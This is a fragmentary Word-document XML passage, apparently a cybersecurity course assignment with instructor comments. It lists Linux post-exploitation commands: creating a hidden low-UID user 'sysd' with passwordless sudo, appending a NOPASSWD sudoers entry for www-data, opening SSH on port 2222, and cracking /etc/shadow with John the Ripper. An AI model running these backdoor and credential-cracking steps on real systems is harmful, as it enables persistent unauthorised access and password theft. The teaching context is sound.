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</w:t>
      </w:r>
      <w:commentRangeStart w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r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sysd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passwd sysd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-u 187 sysd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Groupmod -g 187 sysd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visudo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Sysd ALL=(ALL) NOPASSWD:ALL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Sudo -l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</w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nano /etc/ssh/sshd_config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ssh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sysd@192.168.6.105 -p 2222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-i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sysd@192.168.6.105 -p 2222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Echo “www-data ALL=(ALL) NOPASSWD:ALL” &gt;&gt; /etc/sudoers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john /etc/shadow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Sterne" w:id="2" w:date="2020-11-02T22:25:21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need to add another user to sudoers, we just need to run john. `john /etc/shadow` will run through and crack all the passwords.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I'd like to see results too, but from your note, I understand that you couldn't run the command.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:author="Robert Sterne" w:id="1" w:date="2020-11-02T22:23:1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edit/addition do you need to make to allow access by port 2222?</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:author="Robert Sterne" w:id="0" w:date="2020-11-02T22:22:2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-r flag is a nice way to set your uid and gid to less than 1000!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